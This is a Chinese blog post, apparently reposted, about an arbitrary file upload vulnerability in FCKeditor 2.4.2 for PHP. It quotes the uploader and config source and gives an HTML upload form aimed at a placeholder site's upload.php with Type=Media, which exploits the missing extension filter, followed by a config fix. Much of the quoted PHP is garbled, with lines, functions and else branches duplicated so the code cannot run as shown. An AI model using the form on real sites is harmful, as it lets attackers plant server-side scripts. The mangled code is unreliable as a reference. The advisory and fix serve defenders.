Fckeditor 2.4.2 php任意上传文件漏洞
2024-04-17 00:36:41
1、漏洞描述
fckeditor/editor/filemanager/upload/php/upload.php
<?php
/*
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2007 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
* http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
* http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
* http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* This is the "File Uploader" for PHP.
*/
fckeditor/editor/filemanager/upload/php/config.php
<?php
/*
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2007 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
* http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
* http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
* http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* This is the "File Uploader" for PHP.
*/
require('config.php') ;
require('util.php') ;
require('util.php') ;
// This is the function that sends the results of the uploading process.
function SendResults( $errorNumber, $fileUrl = '', $fileName = '', $customMsg = '' )
{
echo '<script type="text/javascript">' ;
echo 'window.parent.OnUploadCompleted(' . $errorNumber . ',"' . str_replace( '"', '\\"', $fileUrl ) . '","' . str_replace( '"', '\\"', $fileName ) . '", "' . str_replace( '"', '\\"', $customMsg ) . '") ;' ;
echo '</script>' ;
exit ;
}
function SendResults( $errorNumber, $fileUrl = '', $fileName = '', $customMsg = '' )
{
echo '<script type="text/javascript">' ;
echo 'window.parent.OnUploadCompleted(' . $errorNumber . ',"' . str_replace( '"', '\\"', $fileUrl ) . '","' . str_replace( '"', '\\"', $fileName ) . '", "' . str_replace( '"', '\\"', $customMsg ) . '") ;' ;
echo '</script>' ;
exit ;
}
// Check if this uploader has been enabled.
if ( !$Config['Enabled'] )
SendResults( '1', '', '', 'This file uploader is disabled. Please check the "editor/filemanager/upload/php/config.php" file' ) ;
if ( !$Config['Enabled'] )
SendResults( '1', '', '', 'This file uploader is disabled. Please check the "editor/filemanager/upload/php/config.php" file' ) ;
// Check if the file has been correctly uploaded.
if ( !isset( $_FILES['NewFile'] ) || is_null( $_FILES['NewFile']['tmp_name'] ) || $_FILES['NewFile']['name'] == '' )
SendResults( '202' ) ;
if ( !isset( $_FILES['NewFile'] ) || is_null( $_FILES['NewFile']['tmp_name'] ) || $_FILES['NewFile']['name'] == '' )
SendResults( '202' ) ;
// Get the posted file.
$oFile = $_FILES['NewFile'] ;
$oFile = $_FILES['NewFile'] ;
// Get the uploaded file name extension.
$sFileName = $oFile['name'] ;
$sFileName = $oFile['name'] ;
// Replace dots in the name with underscores (only one dot can be there... security issue).
if ( $Config['ForceSingleExtension'] )
$sFileName = preg_replace( '/\\.(?![^.]*$)/', '_', $sFileName ) ;
if ( $Config['ForceSingleExtension'] )
$sFileName = preg_replace( '/\\.(?![^.]*$)/', '_', $sFileName ) ;
$sOriginalFileName = $sFileName ;
// Get the extension.
$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
$sExtension = strtolower( $sExtension ) ;
$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
$sExtension = strtolower( $sExtension ) ;
// The the file type (from the QueryString, by default 'File').
$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
// Check if it is an allowed type.
if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
SendResults( 1, '', '', 'Invalid type specified' ) ;
if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
SendResults( 1, '', '', 'Invalid type specified' ) ;
// Get the allowed and denied extensions arrays.
$arAllowed = $Config['AllowedExtensions'][$sType] ;
$arDenied = $Config['DeniedExtensions'][$sType] ;
$arAllowed = $Config['AllowedExtensions'][$sType] ;
$arDenied = $Config['DeniedExtensions'][$sType] ;
// Check if it is an allowed extension.
if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
SendResults( '202' ) ;
if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
SendResults( '202' ) ;
$sErrorNumber = '0' ;
$sFileUrl = '' ;
$sFileUrl = '' ;
// Initializes the counter used to rename the file, if another one with the same name already exists.
$iCounter = 0 ;
$iCounter = 0 ;
// Get the target directory.
if ( isset( $Config['UserFilesAbsolutePath'] ) && strlen( $Config['UserFilesAbsolutePath'] ) > 0 )
$sServerDir = $Config['UserFilesAbsolutePath'] ;
else
$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
if ( isset( $Config['UserFilesAbsolutePath'] ) && strlen( $Config['UserFilesAbsolutePath'] ) > 0 )
$sServerDir = $Config['UserFilesAbsolutePath'] ;
else
$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
if ( $Config['UseFileType'] )
$sServerDir .= $sType . '/' ;
$sServerDir .= $sType . '/' ;
while ( true )
{
// Compose the file path.
$sFilePath = $sServerDir . $sFileName ;
{
// Compose the file path.
$sFilePath = $sServerDir . $sFileName ;
// If a file with that name already exists.
if ( is_file( $sFilePath ) )
{
$iCounter++ ;
$sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
$sErrorNumber = '201' ;
}
else
{
move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
if ( is_file( $sFilePath ) )
{
$iCounter++ ;
$sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
$sErrorNumber = '201' ;
}
else
{
move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
if ( is_file( $sFilePath ) )
{
$oldumask = umask(0) ;
chmod( $sFilePath, 0777 ) ;
umask( $oldumask ) ;
}
{
$oldumask = umask(0) ;
chmod( $sFilePath, 0777 ) ;
umask( $oldumask ) ;
}
if ( $Config['UseFileType'] )
$sFileUrl = $Config["UserFilesPath"] . $sType . '/' . $sFileName ;
else
$sFileUrl = $Config["UserFilesPath"] . $sFileName ;
$sFileUrl = $Config["UserFilesPath"] . $sType . '/' . $sFileName ;
else
$sFileUrl = $Config["UserFilesPath"] . $sFileName ;
break ;
}
}
}
}
SendResults( $sErrorNumber, $sFileUrl, $sFileName ) ;
?>
?>
fckeditor/editor/filemanager/upload/php/config.php
<?php
/*
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2007 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
* http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
* http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
* http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* Configuration file for the PHP File Uploader.
*/
/*
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2007 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
* http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
* http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
* http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* Configuration file for the PHP File Uploader.
*/
global $Config ;
// SECURITY: You must explicitelly enable this "uploader".
$Config['Enabled'] = false ;
$Config['Enabled'] = false ;
// Set if the file type must be considere in the target path.
// Ex: /userfiles/p_w_picpath/ or /userfiles/file/
$Config['UseFileType'] = false ;
// Ex: /userfiles/p_w_picpath/ or /userfiles/file/
$Config['UseFileType'] = false ;
// Path to uploaded files relative to the document root.
$Config['UserFilesPath'] = '/userfiles/' ;
$Config['UserFilesPath'] = '/userfiles/' ;
// Fill the following value it you prefer to specify the absolute path for the
// user files directory. Usefull if you are using a virtual directory, symbolic
// link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
// Attention: The above 'UserFilesPath' must point to the same directory.
$Config['UserFilesAbsolutePath'] = '' ;
// user files directory. Usefull if you are using a virtual directory, symbolic
// link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
// Attention: The above 'UserFilesPath' must point to the same directory.
$Config['UserFilesAbsolutePath'] = '' ;
// Due to security issues with Apache modules, it is reccomended to leave the
// following setting enabled.
$Config['ForceSingleExtension'] = true ;
// following setting enabled.
$Config['ForceSingleExtension'] = true ;
$Config['AllowedExtensions']['File'] = array() ;
$Config['DeniedExtensions']['File'] = array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis') ;
$Config['DeniedExtensions']['File'] = array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis') ;
$Config['AllowedExtensions']['Image'] = array('jpg','gif','jpeg','png') ;
$Config['DeniedExtensions']['Image'] = array() ;
$Config['DeniedExtensions']['Image'] = array() ;
$Config['AllowedExtensions']['Flash'] = array('swf','fla') ;
$Config['DeniedExtensions']['Flash'] = array() ;
$Config['DeniedExtensions']['Flash'] = array() ;
?>
问题主要是出在config.php文件中未对Media目录作白名单和黑名单的限制,大概是写漏了,因为在fckeditor/editor /filemanager/browser/default/connectors/php目录中的config.php文件对Media是有限制的。
<?php
/*
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2007 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
* http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
* http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
* http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* Configuration file for the File Manager Connector for PHP.
*/
// Path to user files relative to the document root.
$Config['UserFilesPath'] = '/userfiles/' ;
/*
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2007 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
* http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
* http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
* http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* Configuration file for the File Manager Connector for PHP.
*/
global $Config ;
// SECURITY: You must explicitelly enable this "connector". (Set it to "true").
$Config['Enabled'] = false ;
$Config['Enabled'] = false ;
// Path to user files relative to the document root.
$Config['UserFilesPath'] = '/userfiles/' ;
// Fill the following value it you prefer to specify the absolute path for the
// user files directory. Usefull if you are using a virtual directory, symbolic
// link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
// Attention: The above 'UserFilesPath' must point to the same directory.
$Config['UserFilesAbsolutePath'] = '' ;
// user files directory. Usefull if you are using a virtual directory, symbolic
// link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
// Attention: The above 'UserFilesPath' must point to the same directory.
$Config['UserFilesAbsolutePath'] = '' ;
// Due to security issues with Apache modules, it is reccomended to leave the
// following setting enabled.
$Config['ForceSingleExtension'] = true ;
// following setting enabled.
$Config['ForceSingleExtension'] = true ;
$Config['AllowedExtensions']['File'] = array() ;
$Config['DeniedExtensions']['File'] = array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis') ;
$Config['DeniedExtensions']['File'] = array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis') ;
$Config['AllowedExtensions']['Image'] = array('jpg','gif','jpeg','png') ;
$Config['DeniedExtensions']['Image'] = array() ;
$Config['DeniedExtensions']['Image'] = array() ;
$Config['AllowedExtensions']['Flash'] = array('swf','fla') ;
$Config['DeniedExtensions']['Flash'] = array() ;
$Config['DeniedExtensions']['Flash'] = array() ;
$Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
$Config['DeniedExtensions']['Media'] = array() ;
$Config['DeniedExtensions']['Media'] = array() ;
?>
2、漏洞利用
既然fckeditor/editor/filemanager/browser/default/connectors/php/config.php 已经过滤了,那就只能利用fckeditor/editor/filemanager/upload/php/config.php了。
不过如果留意一下改配置文件,就能看到默认情况下“$Config['Enabled'] = false”,是不允许上传的;其次,看upload.php能发现,程序对上传文件夹作了比对,必须是Media,说明在windows下不影响,但在 Linux下则必须是大写M的Media目录,如果是media则返回信息正常,但文件并未上传成功。
自己写段上传脚本:
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxx.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
提交后查看源码就能看到上传文件的位置。
3、漏洞修补
最好用新版,要不就拷贝以下代码到config.php最后。
$Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
$Config['DeniedExtensions']['Media'] = array() ;
转载于:https://blog.51cto.com/obnus/371610
Fckeditor 2.4.2 php任意上传文件漏洞相关推荐
- nginx 上传文件漏洞_文件上传漏洞小结
1 概念 上传文件时,服务器端脚本语言,未对上传的文件进行严格的验证和过滤,就有可能上传恶意的脚本文件,从而控制整个网站,甚至是服务器. 2 危害 • 网站被控制,对文件增删改查,执行命令,链接数据库 ...
- 上传文件漏洞案例分析
上传文件漏洞 漏洞描述 上传漏洞这个顾名思义,就是攻击者通过上传木马文件,直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞. 导致该漏洞的原因在于代码作者没有对访客提交的数 ...
- nginx 上传文件漏洞_文件上传及解析漏洞
注:本文仅供学习参考 文件上传定义: 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行.这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等. 这种攻击方式是最为直接和有效的, ...
- php 上传文件漏洞,【文件上传】PHP文件上传漏洞
0x01 文件上传漏洞 文件上传漏洞顾名思义就是用户上传一个可执行的脚本文件,获得了执行服务器端命令的能力.通常,文件上传是getshell最常用.最直接的方式了.但是,文件上传本身是一个正常的业务需 ...
- nginx 上传文件漏洞_浅谈文件上传漏洞(其他方式绕过总结)
前言 上一篇文章简单的介绍了绕过客户端检测,现在总结一下其他方式绕过. 正文 1.1 服务端MIME类型检测绕过 检测原理:用户上传文件时,服务器会获取这个文件的MIME值,与事先设置好的进行比对,如 ...
- nginx 上传文件漏洞_文件上传漏洞,解析漏洞总结
文件上传漏洞.解析漏洞总结 1.文件上传漏洞是什么 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力.常见场景是web服务器允许用户上传图片或者普通文本文件 ...
- nginx 上传文件漏洞_nginx爆惊天漏洞 上传图片就能入侵服务器
nginx是一个高性能的HTTP和反向代理服务器,也是一个IMAP/POP3/SMTP代理服务器.近年来越来越多的网站管理员放弃了臃肿的Apache而选用nginx,不过看起来一直广受好评的nginx ...
- 上传文件漏洞防御手段
修复方案 1)对文件格式限制,只允许某些格式上传 2)对文件格式进行校验,前端跟服务器都要进行校验(前端校验扩展名,服务器校验扩展名.Content_Type等) 3)将上传目录防止到项目工程目录之外 ...
- nginx 上传文件漏洞_nginx解析漏洞复现
nginx解析漏洞复现 一.漏洞描述 该漏洞与nginx.php版本无关,属于用户配置不当造成的解析漏洞 二.漏洞原理 1. 由于nginx.conf的如下配置导致nginx把以'.php'结尾的文件 ...
最新文章
- php如何解决中文乱码问题?
- 获取某个日期的当前周一的时间
- Android之自定义Adapter的ListView
- Spring的lazy-init详解
- VB.NET(2005)中关于dll调用的错误信息(转)
- 位移运算符(7个)之第一个: 左移
- CoreJava学习3——基本类型的包装类
- numpy的基本使用
- 马尔可夫链 (Markov Chain)是什么鬼
- Aix5.3安装Bash Shell环境
- BZOJ4538 HNOI2016网络(树链剖分+线段树+堆/整体二分+树上差分)
- IEEE与APA引用格式
- 设计类毕业生求职指南!手把手帮你从零开始找到工作!
- 用matlab求众数,Matlab求方差,均值,均方差,协方差的函数
- winfrom中出现 配置系统未能初始化
- HDU 5762 Teacher Bo (水题)
- 5G聚合路由器有哪些优势?能应用在哪些场景?
- 给每一辆车配上“×××”,老牌安企高新兴的交通新作
- Oracle求同比SQL
- 【转贴】看星际争霸人工智能伯克利如何“主宰”了“2010星际争霸人工智能挑战赛”...
热门文章
- request的各种方法大全
- 广播中等待较久出现anr问题
- SoundPool的sample 1 not READY问题
- Q133:PBRT-V3,BSSRDF的采样(15.4章节)
- Q85:对比“直接光照”和“间接光照”的反射模型
- 问题九:C++中::是干嘛用的(域解析操作符)
- iofactory.php,CI框架下引入类库资源PHPPowerPoint报出“ Cannot redeclare class IOFactory”...
- 大数据分析中常用的方法有哪些
- echarts3 graph java_echarts 3.0 使用自定义图标
- vue可编辑div_Vue实现MakeDown编辑器